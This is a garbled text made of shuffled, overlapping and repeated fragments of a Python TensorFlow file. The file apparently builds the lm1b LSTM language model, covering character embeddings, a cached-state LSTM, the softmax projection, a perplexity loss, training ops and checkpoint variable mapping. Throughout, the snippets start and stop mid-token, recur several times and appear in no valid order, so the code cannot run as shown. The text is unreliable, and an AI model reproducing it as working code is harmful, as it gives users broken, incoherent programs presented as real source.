tf.train.Saver(var_list=var_map) saver.restore(sess, os.path.join(run_config['model_dir_path_original'],", "\"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\":", "_attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see:", "trainer # todo: reset lstm hidden state for inference # todo: cleanup batch_sizing", "# todo: cleanup batch_sizing inconsistencies import tensorflow as tf import re import os", "sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} #", "transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights,", "+ \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX +", "\"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out", "LSTM with cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input:", "dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings", "cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table,", "pre-trained model to the current graph :param sess: :param run_config: :return: \"\"\" def", "optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step)", "state \"\"\" # LSTM with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell", "words :param logits: :param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k =", "matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax embedding vars var_map =", "\"\"\" # LSTM with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell =", "trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess,", "{} # Map char embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x),", "# LSTM with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS", "word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers", "return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to", "merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\"", "target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits,", "return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param targets:", "out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs", "= tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x:", "target_weights, hparams=None): \"\"\" :param logits: :param targets: :param target_weights: :param hparams: :return: \"\"\"", "softmax_vars): var_map = {} # Map char embedding vars var_map = merge(var_map, dict(map(lambda", "loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients =", "def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each sequence / timestep in", "tensorflow as tf import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util", ":param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions =", "out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h,", "= tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list)", "LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word", "k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for", "\"\"\" Attach nodes for training. Work in progress... :param loss: :param hparams: :return:", "cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count,", "+ \"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match,", "cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None):", "shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings,", "LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX", "top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def", "the pre-trained model to the current graph :param sess: :param run_config: :return: \"\"\"", ":param input: tensor of word embeddings :param hparams: :return: lstm output and state", "with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size,", "import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from", "top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k])", "} def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out the most", "LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) +", "trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h =", "see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param hparams: :return: lstm output", "attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out the most likely words", "re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v #", "tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project", "{ \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers,", "tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size *", ":return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map char embedding", "r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for v", "cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c,", "trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping", ":param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids", "current graph :param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map", "8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0,", "support to trainer # todo: reset lstm hidden state for inference # todo:", "word predictions :param input: lstm outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\"", "softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None):", "\"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count =", "var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax embedding vars var_map = merge(var_map,", "with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs,", "os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear,", ":param hparams: :return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs,", "hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param", "softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size))", "to sparse vectors / word predictions :param input: lstm outputs :param hparams: :return:", "r_replace, v.name)] = v # Map softmax embedding vars var_map = merge(var_map, dict(map(lambda", "hidden state for inference # todo: cleanup batch_sizing inconsistencies import tensorflow as tf", "\"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\", } for", "softmax embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map", "attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. Work in progress... :param loss: :param", "restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore the pre-trained model to the", "hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm", "hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers", "Var mapping shenanigans to restore the pre-trained model to the current graph :param", "= filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm =", "\"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each sequence / timestep", "tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step}", ":return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients", "hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for layer_num in", "import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached", "= optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\"", "most likely words :param logits: :param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\"", "= tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients =", "# Map lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\",", "create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map char embedding vars var_map =", "= [] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state", "cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull", "= tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def", "r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda", "k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions", "outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS,", "\"\"\" LSTM with cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param", "def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html", "= tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\":", "tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy", ":param logits: :param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits,", ":param logits: :param targets: :param target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets,", "scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"),", "top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. Work in progress... :param", "/ preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS,", "Project LSTM outputs to sparse vectors / word predictions :param input: lstm outputs", "labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE", "= create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b", "softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets,", "hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax", "softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper", "hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192),", "vectors / word predictions :param input: lstm outputs :param hparams: :return: tensor shaped", "\"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size))", "reset lstm hidden state for inference # todo: cleanup batch_sizing inconsistencies import tensorflow", "\"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next", "(x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,", "hparams=None): \"\"\" Attach nodes for training. Work in progress... :param loss: :param hparams:", "lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step =", "as tf import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import", "# Map char embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars)))", "/ word predictions :param input: lstm outputs :param hparams: :return: tensor shaped [?,vocab_size]", "shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024),", "in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in matching_variables:", "/ NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b',", "tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE =", ":param target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights,", "for training. Work in progress... :param loss: :param hparams: :return: \"\"\" trainable_vars =", "global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans", "\"\"\" Project LSTM outputs to sparse vectors / word predictions :param input: lstm", ":return: lstm output and state \"\"\" # LSTM with cached / preserved hidden", "tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h))", "state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input,", "likely words :param logits: :param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k", "x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes = {r\"^(\" +", "cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE =", "-1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients", "tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\":", "matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace,", "import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights", "x: (x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX),", "= tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits)", "word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings", "tf import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge", "# Map softmax embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars)))", "[] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state =", "import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import", ":param loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients", "preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings", "_attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\":", "logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None):", "merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE),", "softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param", "initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0", "of character encoded words :param hparams: :return: dict of inference nodes \"\"\" with", "logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state,", "create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b =", "tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b,", "k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions,", "softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\":", "state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True)", ":param input: lstm outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w =", "ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 =", "num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False)", "x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm)", "from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def", "(-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for layer_num", "Map softmax embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return", "outputs to sparse vectors / word predictions :param input: lstm outputs :param hparams:", "attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each sequence / timestep in input_seqs", "# todo: add GPU support to trainer # todo: reset lstm hidden state", "cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs,", "run_config): \"\"\" Var mapping shenanigans to restore the pre-trained model to the current", "= tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0)", "CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\"", "+ \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\", }", "filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] =", "tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 <", "todo: cleanup batch_sizing inconsistencies import tensorflow as tf import re import os import", "LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\",", "= tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers = []", "def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. Work in progress... :param loss:", "model to the current graph :param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars,", "LSTM outputs to sparse vectors / word predictions :param input: lstm outputs :param", ":return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))),", "NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size))", "embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map", "cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, 